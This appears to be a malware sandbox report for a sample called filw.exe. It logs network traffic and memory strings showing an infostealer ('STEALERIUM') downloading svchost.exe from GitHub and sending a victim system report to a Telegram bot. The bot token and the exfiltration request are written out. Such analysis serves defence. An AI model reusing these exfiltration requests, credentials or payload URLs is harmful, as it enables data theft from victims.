Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1739036071787&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=2b6d2e5290944ea3ab54a4f3a43e66c5&activityId=2b6d2e5290944ea3ab54a4f3a43e66c5&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=376DBFAC669E6C6408F0AA2167EC6DB1; _EDGE_S=F=1&SID=25B4AE51041962121EE7BBDC05666308; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /b?rn=1739036071787&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=376DBFAC669E6C6408F0AA2167EC6DB1&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /kgnfth/tumblr/refs/heads/main/svchost.exe HTTP/1.1Host: raw.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /b2?rn=1739036071787&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=376DBFAC669E6C6408F0AA2167EC6DB1&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1A2cd1b4cedaf4fd1a3abc51739036073; XID=1A2cd1b4cedaf4fd1a3abc51739036073
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1739036071787&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=2b6d2e5290944ea3ab54a4f3a43e66c5&activityId=2b6d2e5290944ea3ab54a4f3a43e66c5&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=CE4372F1C87A41C1BBDADD940D3253B4&MUID=376DBFAC669E6C6408F0AA2167EC6DB1 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=376DBFAC669E6C6408F0AA2167EC6DB1; _EDGE_S=F=1&SID=25B4AE51041962121EE7BBDC05666308; _EDGE_V=1; SM=T
Source: global traffic	HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 848sec-ch-ua-arch: "x86"sec-ch-viewport-width: 986sec-ch-ua-platform-version: "10.0.0"downlink: 7.15sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 200sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: /sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=2B6D2E5290944EA3AB54A4F3A43E66C5.RefC=2025-02-08T17:34:27Z; USRLOC=; MUID=376DBFAC669E6C6408F0AA2167EC6DB1; MUIDB=376DBFAC669E6C6408F0AA2167EC6DB1; _EDGE_S=F=1&SID=25B4AE51041962121EE7BBDC05666308; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=3837cd3a-eab1-40fa-be33-934268de2be5; ai_session=WWPo9Hqha9+S0kYeQLmxdP\|1739036071782\|1739036071782; sptmarket_restored=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=2B6D2E5290944EA3AB54A4F3A43E66C5.RefC=2025-02-08T17:34:27Z
Source: global traffic	HTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: /Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":39,"imageId":"BB1msIAw","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=2B6D2E5290944EA3AB54A4F3A43E66C5.RefC=2025-02-08T17:34:27Z; USRLOC=; MUID=376DBFAC669E6C6408F0AA2167EC6DB1; MUIDB=376DBFAC669E6C6408F0AA2167EC6DB1; _EDGE_S=F=1&SID=25B4AE51041962121EE7BBDC05666308; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=3837cd3a-eab1-40fa-be33-934268de2be5; ai_session=WWPo9Hqha9+S0kYeQLmxdP\|1739036071782\|1739036071782; sptmarket_restored=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=2B6D2E5290944EA3AB54A4F3A43E66C5.RefC=2025-02-08T17:34:27Z
Source: global traffic	HTTP traffic detected: GET /servers HTTP/1.1Host: api.gofile.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /kgnfth/tumblr/refs/heads/main/svchost.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7043342993:AAH3tTE7nerxLSr5-SkYKVrmJwCoBBaGRCU/sendMessage?chat_id=6967646440&text=%60%60%60%0A%F0%9F%94%8D%20%2ASTEALERIUM%20v3.7.1%20REPORT%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%F0%9F%93%85%20Date%3A%202025-02-08%2012%3A34%3A10%20pm%0A%F0%9F%96%A5%EF%B8%8F%20System%3A%20Microsoft%20Windows%2010%20Pro%20%2864%20Bit%29%0A%F0%9F%91%A4%20Username%3A%20user%0A%F0%9F%92%BB%20CompName%3A%20088753%0A%F0%9F%8C%90%20Language%3A%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0A%F0%9F%9B%A1%EF%B8%8F%20Antivirus%3A%20Windows%20Defender%0A%0A%2AHARDWARE%20INFORMATION%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%E2%9A%A1%20CPU%3A%20Intel%28R%29%20Core%28TM%292%20CPU%206600%20%40%202.40%20GHz%0A%F0%9F%8E%AE%20GPU%3A%209ZWORAW%0A%F0%9F%93%8A%20RAM%3A%204095MB%0A%F0%9F%94%8B%20Power%3A%20NoSystemBattery%20%28100%25%29%0A%F0%9F%93%BA%20Screen%3A%201280x1024%0A%F0%9F%93%B7%20Webcams%3A%200%0A%0A%2ANETWORK%20INFORMATION%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%F0%9F%8C%90%20Gateway%20IP%3A%20192.168.2.1%0A%F0%9F%94%92%20Internal%20IP%3A%20192.168.2.4%0A%F0%9F%8C%8D%20External%20IP%3A%208.46.123.189%0A%0A%2ADETECTED%20DOMAINS%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%20%20%20-%20%F0%9F%8F%A6%20Banking%20Services%20%28No%20data%29%0A%20%20%20-%20%F0%9F%92%B0%20Crypto%20Services%20%28No%20data%29%0A%20%20%20-%20%F0%9F%94%9E%20Adult%20Websites%20%28No%20data%29%0A%0A%2ABROWSER%20DATA%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%20%20%20%E2%88%9F%20%F0%9F%8D%AA%20Cookies%3A%209%0A%20%20%20%E2%88%9F%20%F0%9F%93%9C%20History%3A%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks%3A%205%0A%0A%2ASOFTWARE%20%26%20ACCOUNTS%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%0A%2ADEVICE%20INFORMATION%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%20%20%20%E2%88%9F%20%F0%9F%94%91%20Windows%20Key%0A%20%20%20%E2%88%9F%20%F0%9F%96%BC%EF%B8%8F%20Desktop%20Shot%0A%0A%2
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr

String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: icanhazip.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: api.gofile.io
Source: global traffic	DNS traffic detected: DNS query: store-eu-par-1.gofile.io
Source: global traffic	DNS traffic detected: DNS query: szurubooru.zulipchat.com

Source: unknown

HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 899sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 3436:3D03D5:4AE141:520B7B:67A79591Accept-Ranges: bytesDate: Sat, 08 Feb 2025 17:34:12 GMTVia: 1.1 varnishX-Served-By: cache-ewr-kewr1740069-EWRX-Cache: MISSX-Cache-Hits: 0X-Timer: S1739036053.640027,VS0,VE9Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: 7244bad5f10b9113aa934871f26eacc2f77830adExpires: Sat, 08 Feb 2025 17:39:12 GMTSource-Age: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 3436:3D03D5:4AE141:520B7B:67A79591Accept-Ranges: bytesDate: Sat, 08 Feb 2025 17:34:14 GMTVia: 1.1 varnishX-Served-By: cache-ewr-kewr1740020-EWRX-Cache: HITX-Cache-Hits: 1X-Timer: S1739036054.136103,VS0,VE1Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: c98d55b67242bb1541ba9588b096351f1814ef22Expires: Sat, 08 Feb 2025 17:39:14 GMTSource-Age: 1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: B0CC:1E7862:2F2628:33FF96:67A7959AAccept-Ranges: bytesDate: Sat, 08 Feb 2025 17:34:19 GMTVia: 1.1 varnishX-Served-By: cache-nyc-kteb1890071-NYCX-Cache: MISSX-Cache-Hits: 0X-Timer: S1739036059.255030,VS0,VE29Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: 2c6b9ed69cae4f922037fcc262aae5933e809b09Expires: Sat, 08 Feb 2025 17:39:19 GMTSource-Age: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 3436:3D03D5:4AE141:520B7B:67A79591Accept-Ranges: bytesDate: Sat, 08 Feb 2025 17:34:33 GMTVia: 1.1 varnishX-Served-By: cache-ewr-kewr1740077-EWRX-Cache: HITX-Cache-Hits: 1X-Timer: S1739036073.407460,VS0,VE1Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: 6386a1e39dea4bfd2036a6d03eaa302d10199090Expires: Sat, 08 Feb 2025 17:39:33 GMTSource-Age: 21
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 3436:3D03D5:4AE141:520B7B:67A79591Accept-Ranges: bytesDate: Sat, 08 Feb 2025 17:34:40 GMTVia: 1.1 varnishX-Served-By: cache-ewr-kewr1740043-EWRX-Cache: HITX-Cache-Hits: 1X-Timer: S1739036080.165162,VS0,VE1Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: 73e4b8e5dc62472e909b2310b48cdea0535ba4beExpires: Sat, 08 Feb 2025 17:39:40 GMTSource-Age: 28

Source: filw.exe, 00000000.00000002.1993398707.0000019D1299E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.gofile.io
Source: filw.exe, 00000000.00000002.1993398707.0000019D125B7000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.1993398707.0000019D12746000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: filw.exe, 00000000.00000002.2002880618.0000019D2B05A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: filw.exe, 00000000.00000002.1993398707.0000019D12504000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.1993398707.0000019D125B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com
Source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: filw.exe, 00000000.00000002.1993398707.0000019D125B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://raw.githubusercontent.com
Source: filw.exe, 00000000.00000002.1993398707.0000019D12421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: filw.exe, 00000000.00000002.1993398707.0000019D1299E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://store-eu-par-1.gofile.io
Source: filw.exe, 00000000.00000002.1993398707.0000019D12781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://szurubooru.zulipchat.com
Source: chromecache_600.8.dr	String found in binary or memory: http://www.broofa.com
Source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: tmp9493.tmp.dat.0.dr, tmp94C3.tmp.dat.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_605.8.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_605.8.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: filw.exe, 00000000.00000002.2004445944.0000019D2B760000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://aka.ms/binaryformatter
Source: filw.exe, 00000000.00000002.2004445944.0000019D2B760000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: filw.exe, 00000000.00000002.2004445944.0000019D2B760000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
Source: filw.exe, 00000000.00000002.1993398707.0000019D1299E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.goH
Source: filw.exe, 00000000.00000002.1993398707.0000019D1299E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.goHj
Source: filw.exe, 00000000.00000002.1993398707.0000019D1299E000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.1993398707.0000019D12552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io
Source: filw.exe, 00000000.00000002.1993398707.0000019D1299E000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.1993398707.0000019D12552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/servers
Source: filw.exe, 00000000.00000002.1993398707.0000019D126E2000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.1993398707.0000019D125B7000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.1993398707.0000019D12496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: filw.exe, 00000000.00000002.1993398707.0000019D12421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: filw.exe, 00000000.00000002.1993398707.0000019D12496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7043342993:AAH3tTE7nerxLSr5-SkYKVrmJwCoBBaGRCU/getMe
